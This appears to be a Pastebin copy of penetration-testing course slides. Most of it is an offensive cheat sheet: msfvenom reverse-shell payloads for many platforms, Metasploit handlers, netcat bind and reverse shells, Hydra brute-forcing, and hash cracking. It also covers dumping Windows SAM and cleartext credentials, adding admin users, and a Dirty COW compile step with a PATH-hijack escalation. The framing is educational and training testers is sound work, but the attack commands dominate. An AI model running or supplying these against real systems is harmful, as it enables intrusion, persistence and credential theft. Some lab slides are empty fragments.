Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Razboi cibernetic
- Introduction
- - Definition of Penetration Testing
- - Who needs Penetration Testing?
- - Penetration Testing Viewpoints
- - Phases of Penetration Testing
- - Reconnaissance and Information Gathering
- - Network Enumeration and Scanning
- - Vulnerability Testing and Exploitation
- - Reporting
- Penetration Testing
- Definition of Penetration Testing:
- - A penetration test or pentest is a test evaluating the strengths of all
- security controls on the computer system. Penetration tests evaluate
- procedural and operational controls as well as technological
- controls.
- Who needs Penetration Testing
- - Banks/Financial Institutions, Government Organizations, Online
- Vendors, or any organization processing and storing private
- information
- - Most certifications require or recommend that penetration tests be
- performed on a regular basis to ensure the security of the system.
- - PCI Data Security Standard's Section 11.3 requires organizations
- to perform application and penetration tests at least once a year.
- - HIPAA Security Rule's section 8 of the Administrative Safeguards
- requires security process audits, periodic vulnerability analysis and
- penetration testing.
- Penetration Testing Viewpoints
- -External vs. Internal
- Penetration Testing can be performed from the viewpoint of an
- external attacker or a malicious employee.
- - Overt vs. Covert
- Penetration Testing can be performed with or without the
- knowledge of the IT department of the company being tested.
- Phases of Penetration Testing
- - Reconnaissance and Information Gathering
- - Network Enumeration and Scanning
- - Vulnerability Testing and Exploitation
- - Reporting
- Reconnaissance and Information Gathering
- Purpose: To discover as much information about a target
- (individual or organization) as possible without actually making
- network contact with said target.
- Methods:
- • Organization info discovery via WHOIS
- • Google search
- • Website browsing
- WHOIS Results for www.clemson.edu
- Domain Name: CLEMSON.EDU
- Registrant:
- Clemson University
- 340 Computer Ct
- Anderson, SC 29625
- UNITED STATES
- Administrative Contact:
- Network Operations Center
- Clemson University
- 340 Computer Court
- Anderson, SC 29625
- UNITED STATES
- (864) 656-4634
- noc@clemson.edu
- Technical Contact:
- Mike S. Marshall
- DNS Admin
- Clemson University
- Clemson University
- 340 Computer Court
- Anderson, SC 29625
- UNITED STATES
- (864) 247-5381
- hubcap@clemson.edu
- Name Servers:
- EXTNS1.CLEMSON.EDU 130.127.255.252
- EXTNS2.CLEMSON.EDU 130.127.255.253
- EXTNS3.CLEMSON.EDU 192.42.3.5
- Network Enumeration and Scanning
- Purpose: To discover existing networks owned by a target as well
- as live hosts and services running on those hosts.
- Methods:
- • Scanning programs that identify live hosts, open ports, services, and other
- info (Nmap, autoscan)
- • DNS Querying
- • Route analysis (traceroute)
- Begin Scanning
- • Survey the network in any case whether you know the network diagram
- or are blind testing
- • Scans include all devices on the network, their Operating System, open
- ports, and services running
- • If feasible, look for open access ports to the network in discreet areas.
- • Ideal for placing your own wireless access points
- Network Scans
- •Try the low hanging fruit
- • Check network places and shared drives for unrestricted access.
- • Copy machines may have onboard hard drives with file sharing
- • Users may know enough to be dangerous sharing folders
- NMAP
- •Network scanner
- •Identifies devices and Operating Systems
- •More quiet than pinging devices
- •Uses the REQ,ACK,SYN for communications
- •Returns open ports and has options for more stealthy operations on
- a sensitive network
- Nmap Port Scan types
- • Scan a single IP nmap 192.168.1.1
- • Scan a host nmap www.testhostname.com
- • Scan a range of IPs nmap 192.168.1.1-20
- • Scan a subnet nmap 192.168.1.0/24
- • Scan targets from a text file nmap -iL list-of-ips.txt
- • Scan using TCP connect nmap -sT 192.168.1.1
- • Scan using TCP SYN scan (default) nmap -sS 192.168.1.1
- • Scan UDP ports nmap -sU -p 123,161,162 192.168.1.1
- • Scan selected ports - ignore discovery nmap -Pn -F
- 192.168.1.1
- Nmap Port Scan types
- Detect OS and Services nmap -A 192.168.1.1
- Standard service detection nmap -sV 192.168.1.1
- More aggressive Service Detection nmap -sV --versionintensity
- 5 192.168.1.1
- Lighter banner grabbing detection nmap -sV --versionintensity
- 0 192.168.1.1
- Save default output to file nmap -oN outputfile.txt
- 192.168.1.1
- Save results as XML nmap -oX outputfile.xml 192.168.1.1
- Save results in a format for grep nmap -oG outputfile.txt
- 192.168.1.1
- Save in all formats nmap -oA outputfile 192.168.1.1
- Nmap Results
- nmap -sS 127.0.0.1
- 123
- Starting Nmap 4.01 at 2018-07-06 17:23 BST
- 4 Interesting ports on chaos (127.0.0.1):
- 5 (The 1668 ports scanned but not shown below are in state: closed)
- 6 PORT STATE SERVICE
- 7 21/tcp open ftp
- 8 22/tcp open ssh
- 9 631/tcp open ipp
- 10 6000/tcp open X11
- 11
- 12 Nmap finished: 1 IP address (1 host up) scanned in 0.207
- 13 seconds
- Vulnerability Scanners
- •Nessus
- • Free for personal use
- • Linux can use apt-get
- • Windows can download
- • Requires registration before usage
- •openVAS
- • Spin off of Nessus
- • http://www.openvas.org/
- Nessus
- •Enumerates vulnerabilities per device
- •Web GUI provides easy usage and real-time enumerations
- •Works with Metasploit to provide a scan and attempt at known
- vulnerabilities
- • Requires database for saving Nessus scans
- •Use the “Search” in Metasploit to find modules relating to scans to
- begin probing
- John the Ripper
- •Offline password cracker
- •Used on SAM dumps, LANMAN, most types of password hashes
- • Windows keeps local user account hashes in the Security Accounts Manager (SAM)
- database
- •Can also be used to generate mangled wordlists for uses with other tools.
- • Know the how to write rules in john.conf file
- • Output file can be in a txt format
- • Remember the john.pots file
- Medusa or Hydra
- •Online password cracking
- •Great for dictionary attacks (wordlists)
- •Best if used on known open ports
- •Wordlists can be found online and mangled with JTR for more complex
- P@55w0rds!
- Pointers When Using Tools
- •Read any precautionary comments before starting. Some exploits could
- cause damage to databases or resources costing your client money
- •Try not to use client’s network to do quick research, it could contaminate
- results
- •Advise IT staff of certain network loading tests and log expectations
- •Ask, when in doubt if a critical resource is discovered vulnerable, about
- exploiting
- •Proof-of-concept may be all that is needed
- Finding Public Exploits
- • Exploit-DB
- • http://www.exploit-db.com/
- • Searchsploit
- • The exploit-db collection of exploits is mirrored locally on Kali machines. Using the command searchsploit <search
- term> you can bring up a listing of exploits. Be aware that the search must be in all lower case.
- • Metasploit
- • Metasploit has a range of exploits built in and can be searched with the “search” command. You can also grep the
- search results with the syntax “grep <grep term> search <search term>”. Filters are also provided to let you narrow
- down your search specifically to exploits if desired.
- • SecurityFocus
- • http://www.securityfocus.com/
- • Although in my opinion not as comprehensive as exploit-db you still occasionally turn up a working proof of concept
- at security focus that isn’t mirrored elsewhere. In general a good site to check.
- • 1337Day
- • http://1337day.com/
- • I can’t speak for the reliability of the site as I haven’t used it much, however this is another resource when searching
- for exploits. Semi-0 day (for want of a better term) exploits are sometimes also sold here before eventually leaking
- out to everyone.
- Metasploit
- •Metasploit is an open source platform
- • supports vulnerability research
- • exploit development
- • creation of custom security tools
- •Included in BackTrack distributions
- •Recommend intense training to master
- •Metasploitable VM download
- Metasploit
- • List payloads
- • msfvenom -l
- • Binaries
- • Linux
- • msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf >
- shell.elf
- • Windows
- • msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe >
- shell.exe
- • Mac
- • msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho >
- shell.macho
- • Web Payloads
- • PHP
- • msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
- • cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
- • ASP
- • msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp >
- shell.asp
- • JSP
- • msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
- • WAR
- • msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
- Metasploit
- • Scripting Payloads
- • Python
- • msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On>
- -f raw > shell.py
- • Bash
- • msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f
- raw > shell.sh
- • Perl
- • msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f
- raw > shell.pl
- • Shellcode
- • For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom
- will output code that is able to be cut and pasted in this language for your exploits.
- • Linux Based Shellcode
- • msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your
- Port to Connect On> -f <language>
- • Windows Based Shellcode
- • msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your
- Port to Connect On> -f <language>
- • Mac Based Shellcode
- • msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to
- Connect On> -f <language>
- Metasploit
- • Handlers
- • Metasploit handlers can be great at quickly setting up
- Metasploit to be in a position to receive your incoming
- shells. Handlers should be in the following format.
- • use exploit/multi/handler
- • set PAYLOAD <Payload name>
- • set LHOST <LHOST value>
- • set LPORT <LPORT value>
- • set ExitOnSession false
- • exploit -j -z
- • Once the required values are completed the following
- command will execute your handler – ‘msfconsole -L -r ‘
- What is Happening...
- •Known vulnerability occurs in victim
- •Related exploit is set in Metasploit
- •Options are configured for the victim
- •Payloads are viewed and selected
- • Payloads are what the attacker wishes to happen
- •Exploit occurs causing the victim process to crash
- •Payload is triggered
- Pushing Greater Limits
- •Metasploit offers much more than the scope of this presentation
- • Fuzzing protocols like IMAP and TFTP
- • Writing fuzzers can become the first step to creating new exploits
- • Good for protocols on the network that have no known module
- • Password sniffing on the wire
- • Creating backdoors to maintain access
- Wrapping Up The Audit
- •Check for any open activities
- •Confer with IT staff that all network activity is normal
- •Ensure all documentation is collected
- Post-Audit
- •Generate documentation of all work performed
- • Official audit report to the client
- • Should incorporate summaries, details, and exhibits
- • Include screenshots and pictures taken
- • Describe details of each action and what threat it presents
- Presentation
- •In most cases, a brief presentation to client and selected staff will be
- performed
- • Include most significant threats discovered and solutions
- • Emphasize the impact of all negative findings to the business
- • Include positive notes where security was solid
- Post-Audit Report
- •Audit report is a confidential document to the client
- •It is an official report that will be integrated into reports of other audits
- for that client
- •Use encryption if delivering by email
- •Exercise infosec in all cases regardless of method used for
- communications
- •Be thorough, use passive writing, use pictures
- Vulnerability Testing and Exploitation
- Purpose: To check hosts for known vulnerabilities and to see if they
- are exploitable, as well as to assess the potential severity of said
- vulnerabilities.
- Methods:
- • Remote vulnerability scanning (Nessus, OpenVAS)
- • Active exploitation testing
- o Login checking and bruteforcing
- o Vulnerability exploitation (Metasploit, Core Impact)
- o 0day and exploit discovery (Fuzzing, program analysis)
- o Post exploitation techniques to assess severity (permission
- levels, backdoors, rootkits, etc)
- Reporting
- Purpose: To organize and document information found during the
- reconnaissance, network scanning, and vulnerability testing phases of
- a pentest.
- Methods:
- • Documentation tools (Dradis)
- o Organizes information by hosts, services, identified hazards and
- risks, recommendations to fix problems
- Connect to a remote system
- • Terminal = An interface that provides a display for output and a key board
- for input to a shell session .
- • Shell = Interpreter that executes commands typed as string
- • Console: Actually two types of console we use
- • Physical console=The hardware display and keyboard used to interact
- with a system
- • Virtual console= One of multiple logical consoles that can each support
- an independent login session.
- • tty(teletype ie terminal). = A terminal is a basically just a user interface
- device that uses text for input and output.message.
- Spawning a TTY Shell
- • Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the
- system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will
- depend on the system environment and installed packages.
- • python -c 'import pty; pty.spawn("/bin/sh")'
- • echo os.system('/bin/bash')
- • /bin/sh -i
- • perl —e 'exec "/bin/sh";'
- • perl: exec "/bin/sh";
- • ruby: exec "/bin/sh"
- • lua: os.execute('/bin/sh')
- • (From within IRB)
- • exec "/bin/sh"
- • (From within vi)
- • :!bash
- • (From within vi)
- • :set shell=/bin/bash:shell
- • (From within nmap)
- • !sh
- Netcat
- • Connect to a TCP Port
- • nc -nv <IP Address> <Port>
- • Listen on a TCP Port
- • nc -lvp <port>
- • Connect and receive a HTTP Page
- • nc -nv <IP Address> 80
- • HEAD / HTTP/1.1
- • Transferring a File
- • nc -lvp 4444 >output.txt # Receiving End
- • nc -nv <IP Address> < input.txt # Sending End
- • Set up a Netcat Bind Shell (Windows)
- • nc -lvp 4444 -e cmd.exe
- • nc -nv <IP Address> 4444 # Connect to the shell
- • Set up a Netcat Bind Shell (Linux)
- • nc -lvp 4444 -e /bin/sh
- • nc -nv <IP Address> 4444 # Connect to the shell
- • Set up a Netcat Reverse Shell (Windows)
- • nc -lvp 443 # Attacker listening for connection
- • nc -nv <IP Address> 443 -e cmd.exe
- • Set up a Netcat Reverse Shell (Linux)
- • nc -lvp 443
- • nc -nv <IP Address> 443 -e /bin/sh
- • Netcat as a Port Scanner
- • nc -z <IP Address> <Port Range in abc - xyz format>
- Cracking Network Passwords
- (Hydra)
- • Basic Syntax
- • hydra -l/-L <user name / user list> -p/-P <password / password list>
- <protocol://hostname>
- • Break Down
- • -l/-L : Only one of these is needed. Little l is for nominating a single username,
- capital is for a username list
- • -p/-P : Only one of these is needed again. Little p for a single password, capital
- p for a password list.
- • <protocol://hostname> : This specifies the target and protocol. For example
- cracking ssh on 192.168.1.1 would be ssh://192.168.1.1, while ftp on 10.1.2.3
- would be ftp://10.1.2.3
- • Example
- • hydra -l bob -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.15 # Cycle
- through a wordlist trying to log in as bob over ssh on 192.168.1.1
- • hydra -L usernames.txt -p password 192.168.1.1 http-get / -s 80 # Cycle
- through a list of usernames and try and log into the router at
- http://192.168.1.1:80/ with the password 'password'
- Generating Wordlists
- • Obtaining a Relevant Password List
- • cewl http://netsec.ws/ -d 1 -m 6 -w netsec.txt
- • Breaking this down we’ll be crawling netsec.ws and (-d) 1 link layer deep from the main page. The minimum length of words we’re going to be
- keeping is 6 characters, and we’re saving the output to a text file netsec.txt. Testing the result we have accumulated a lot of passwords directly
- related to netsec.ws and it’s content.
- • wc -l netsec.txt
- • 1741 netsec.txt
- • Building Off a Solid Foundation
- • Now we have a solid list of candidate passwords we often want to build off this by mutating the passwords according to particular rules. John the
- ripper provides awesome functionality for this with their wordlist rules. They can be viewed and added to in the file located at /etc/john/john.conf
- under ‘#Wordlist mode rules’. Some examples are,
- • # Try words as they are
- • :
- • # Lowercase every pure alphanumeric word
- • -c >3 !?X l Q
- • # Capitalize every pure alphanumeric word
- • -c (?a >2 !?X c Q
- • # Lowercase and pluralize pure alphabetic words
- • <* >2 !?A l p
- • # Lowercase pure alphabetic words and append '1'
- • <* >2 !?A l $1
- • john ---wordlist=netsec.txt --rules --stdout > netsec-mutated.txt
- Identifying Hashes (Hash
- Identifier)
- • Often when you wish to crack a hash you need to identify what
- type of has it is so you can successfully configure oclHashcat or
- your favorite cracking tool. Hash-identifier is a nifty tool built into
- Kali which will allow you to print out the most likely hash format.
- • Tool
- • hash-identifier
- • Usage
- • Call the program and paste in your hash
- • hash-identifier
- • Example
- Cracking Hashes (oclHashcat)
- • Basic Syntax
- • oclHashcat -m <hash type><hash list> <word list> -o <found list> --remove
- • Break Down
- • -m : signifies the type of hash being attacked. A list of hash types and their
- value can be found here –
- http://hashcat.net/wiki/doku.php?id=example_hashes
- • : a text file containing a list of all the hashes you wish to attack. Can be an
- individual hash if you wish.
- • : a file containing likely passwords.
- • -o : store recovered values in a separate file
- • –remove : remove successfully recovered hashes from the original list. Useful
- for running the same file against several lists without having to waste time
- searching for hashes already broken.
- • Example
- • oclhashcat -m 500 example500.hash /usr/share/wordlists/rockyou.txt -o
- found.txt
- Obtaining Windows Passwords
- • NT Hashes
- • Newer Windows operating systems use the NT hash. In simple terms there is no significant
- weakness in this hash that sets it apart from any other cryptographic hash function. Cracking
- methods such as brute force, rainbow tables or word lists are required to recover the password
- if it’s only stored in the NT format.
- • An example of a dumped NTLM hash with only the NT component (as seen on newer systems.
- • Administrator:500:NO
- PASSWORD*********************:EC054D40119570A46634350291AF0F72:::
- • It’s worth noting the “no password” string is variable based on the tool. Others may present
- this information as padded zeros, or commonly you may see the string
- “AAD3B435B51404EEAAD3B435B51404EE” in place of no password. This signifies that the LM
- hash is empty and not stored.
- • Location
- • The hashes are located in the Windows\System32\config directory using both the SAM and
- SYSTEM files. In addition it’s also located in the registry file HKEY_LOCAL_MACHINE\SAM
- which cannot be accessed during run time. Finally backup copies can be often found in
- Windows\Repair.
- Obtaining Windows Passwords
- • Tool – PwDump7 – http://www.tarasco.org/security/pwdump_7/
- • This tool can be executed on the system machine to recover the system hashes. Simply
- download the run the binary with at least administrator account privileges.
- • Tool – Windows Credential Editor – http://www.ampliasecurity.com/
- • Windows Credentials Editor (WCE) is great for dumping passwords that are in memory.
- Personally I typically use it with the -w flag to dump passwords in clear text. This can
- often net you passwords that are infeasible to get any other way.
- • Tool – Meterpreter
- • If you have a meterpreter shell on the system, often you can get the hashes by calling the
- hashdump command.
- • Method – Recovery Directory
- • Occasionally you may not have direct access to the file required, or perhaps even
- command line interaction with the victim. An example of this would be a local file
- inclusion attack on a web service. In those cases it’s recommended you try and recover
- the SYSTEM and SAM directories located in the Windows\Repair directory.
- Simple Windows Commands
- • Check Who You Are
- • echo %USERDOMAIN%\%USERNAME
- • whoami
- • Check Windows Version
- • systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
- • Add a User
- • net user <username> <password> /add</password></username>
- • Add a User to the Administrators Group
- • net localgroup administrators <username> /add
- • Getting from Administrator to System
- • psexec -s cmd.exe
- • Getting system with Meterpreter
- • getsystem
- • (from the meterpreter shell)
- • Changing a Users Password
- • net user <username> <password>
- • View Domain Groups
- • net group /domain
- • View Members of Domain Group
- • net group /domain <Group Name>
- Simple Linux Commands
- • Requesting a DHCP IP Address
- • dhclient <interface></interface>
- • Setting a Static IP Address
- • ifconfig <interface> <ip address>/<cidr>
- • route add default gw <gateway IP Address>
- • echo nameserver <nameserver / Gateway IP Address> >
- /etc/resolv.conf</nameserver></gateway></cidr></ip></interface>
- • Enable service at boot
- • update-rc.d <service> enable
- • Isolate a particular field (Cutting)
- • cat <filename> | cut -d <delimiter for each field> -f <field number, other field numbers> > output.txt
- • Find and replace instances in a file (sed)
- • cat file.txt | sed -e "s/<instance to find>/<instance to replace it with>/g" > output.txt
- • Remove End Characters
- • cat file.txt | rev | cut -c<how many characters you want removed+1> | rev > output.txt
- • Merge Two Files Side by Side
- • paste -d" " <first file> <second file> > <output file>
- • Tar all files in a directory
- • tar -cvf newtarfile.tar targetdir/
- • Grep all files in a directory and subdirectory (print path to found files)
- • grep -H -i -r "Search Text" targetdir/
- Linux Privilege Escalation Scripts
- • LinEnum
- • http://www.rebootuser.com/?p=1758
- • This tool is great at running through a heap of things you should check on a Linux
- system in the post exploit process. This include file permissions, cron jobs if visible,
- weak credentials etc. The first thing I run on a newly compromised system.
- • LinuxPrivChecker
- • http://www.securitysift.com/download/linuxprivchecker.py
- • This is a great tool for once again checking a lot of standard things like file
- permissions etc. The real gem of this script is the recommended privilege
- escalation exploits given at the conclusion of the script. This is a great starting point
- for escalation.
- • g0tmi1k’s Blog
- • http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- • Not so much a script as a resource, g0tmi1k’s blog post here has led to so many
- privilege escalations on Linux system’s it’s not funny. Would definitely recommend
- trying out everything on this post for enumerating systems.
- WEB APPLICATION PENETRATION
- WEB APPLICATION PENETRATION
- WEB APPLICATION PENETRATION
- WEB APPLICATION PENETRATION
- Lab – hands on
- • Scanning network
- • Nmap, nikto, gobuster nmap –sV –sC (ip
- address)
- • Use the LFI
- • Export Base64 pages
- • Discover user’s credentials
- • Remote connect to services exposed
- • Upload a shell
- • https://github.com/pentestmonkey/php-reverse-shell
- Lab – hands on
- Lab – hands on
- • https://www.exploit-db.com/exploits/40616/
- • gcc cow32.c -o cowroot -pthread 2>/dev/null
- • $ python -c ‘import pty; pty.spawn(“/bin/bash”)’
- • Deconstructing an ELF File
- • This let us know that the program is trying to call the cat command to
- view the contents of a file called msg.txt available under the home
- directory of a user called mike. Moreover, let’s recall the the file is SUID.
- What should we do now?
- • There is a popular technique where attackers manage to manipulate the
- $PATH bash environmental to escalate their privileges. Imagine what
- would happen if we edit the $PATH variable and instead of the default
- value we put a new one, a simple dot (.). Whenever a program
- (executable) is called, bash will look at the “.” directory for the program
- instead of /usr/local/bin, /usr/bin and more. Let’s see what this mean.
- Lab – hands on
- From what we can see, we have an
- ELF 32-bit LSB executable. When
- executing the file, we get the
- following error:
- Lab – hands on
- Lab – hands on
- Gather experience
- • https://www.abatchy.com/2017/02/osc
- p-like-vulnhub-vms
Add Comment
Please, Sign In to add comment